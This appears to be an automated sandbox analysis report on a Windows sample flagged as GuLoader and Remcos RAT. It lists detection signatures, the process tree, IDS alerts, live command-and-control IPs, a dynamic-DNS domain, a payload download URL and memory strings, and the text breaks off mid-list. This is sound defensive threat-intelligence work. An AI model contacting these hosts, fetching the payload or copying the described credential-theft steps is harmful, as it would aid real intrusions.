
Windows Analysis Report
SMGS-RCDU5010031.exe

Overview

General Information

Sample Name: SMGS-RCDU5010031.exe
Analysis ID: 1330791
MD5: b434372e36a7d17bc61c8062bbc14015
SHA1: 1e28e9114efdf6bd2a9e0e96cd69b046abf94315
SHA256: b94541afbfc65ad19aa72f3c547c65c0e0e6e706c7cd18c31c80efe501d28346

Detection

Malware family: GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • SMGS-RCDU5010031.exe (PID: 1508 cmdline: C:\Users\user\Desktop\SMGS-RCDU5010031.exe MD5: B434372E36A7D17BC61C8062BBC14015)
    • wab.exe (PID: 4672 cmdline: C:\Users\user\Desktop\SMGS-RCDU5010031.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 8112 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 1964 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6620 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Payload URL": "http"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\paqlgkfs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: SMGS-RCDU5010031.exe PID: 1508 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
No Sigma rule has matched

Timestamp: 10/23/23-20:39:41.494599
Source IP: 192.168.11.20
Destination IP: 77.238.121.250
SID: 2855192
Source Port: 50036
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/23/23-20:39:45.144854
Source IP: 192.168.11.20
Destination IP: 94.156.6.253
SID: 2032776
Source Port: 50037
Destination Port: 2402
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/23/23-20:46:08.903547
Source IP: 94.156.6.253
Destination IP: 192.168.11.20
SID: 2032777
Source Port: 2402
Destination Port: 50037
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection
Source: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin | Avira URL Cloud: Label: malware
Source: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http"}
Source: SMGS-RCDU5010031.exe | ReversingLabs: Detection: 42%
Source: Yara match | File source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe | ReversingLabs: Detection: 42%
Source: SMGS-RCDU5010031.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\paqlgkfs.dat
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\ebwamkguuyj
Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405841
Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose | 0_2_00406393
Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_004027FB FindFirstFileW | 0_2_004027FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_375610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 2_2_375610F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA | 2_2_37566580
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW | 4_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen | 5_2_00407C87
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen | 6_2_00407898

Networking
Source: Traffic | Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50036 -> 77.238.121.250:80
Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50037 -> 94.156.6.253:2402
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50037
Source: unknown | DNS query: name: ourt2949aslumes9.duckdns.org
Source: Malware configuration extractor | URLs: http
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: kapsnovin.com | Cache-Control: no-cache
Source: Joe Sandbox View | ASN Name: NET1-ASBG NET1-ASBG
Source: Joe Sandbox View | ASN Name: ASIATECHIR ASIATECHIR
Source: Joe Sandbox View | IP Address: 94.156.6.253 94.156.6.253
Source: Joe Sandbox View | IP Address: 77.238.121.250 77.238.121.250
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: global traffic | TCP traffic: 192.168.11.20:50037 -> 94.156.6.253:2402
Source: wab.exe, 00000002.00000002.16922298263.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 00000002.00000003.12062619602.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12062721777.0000000006B81000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpEd
Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphx
Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpmd
Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpn.net/son.gpp.dll
Source: wab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin
Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJ
Source: wab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.bin
Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_
Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.biny
Source: SMGS-RCDU5010031.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000006.00000002.12095990427.000000000078C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/
Source: wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comata
Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000004.00000002.12129302860.000000000059B000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: wab.exe, 00000004.00000003.12123400386.00000000046DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doub
Source: wab.exe, 00000004.00000003.12123467111.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123597367.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123700609.00000000046DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubXXO
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.double
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doublecli
Source: wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activ
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activi
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123198637.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119839410.00000000046D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
Source: wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://adservice.google.co.
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.med
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.medi
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/check
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/checks
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eb2.3lif
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eb2.3lift.com/sync
Source: wab.exe, 00000004.00000003.12115362208.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eb2.3lift.com/sync?
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://get.a
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://get3.adobe
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://get3.adobe.co
Source: wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagea
Source: wab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: wab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ib.adnxs.com/async_usersync_file
Source: wab.exe, 00000004.00000002.12129302860.0000000000592000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.12130749697.0000000004EDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsign
Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127921633.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127977949.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12128266971.00000000046BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
Source: wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116911090.00000000046CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
Source: wab.exe, 00000004.00000003.12115443311.00000000046D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
Source: wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: wab.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.offi
Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeap
Source: wab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117180349.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116911090.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116958853.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116834528.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12128117793.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 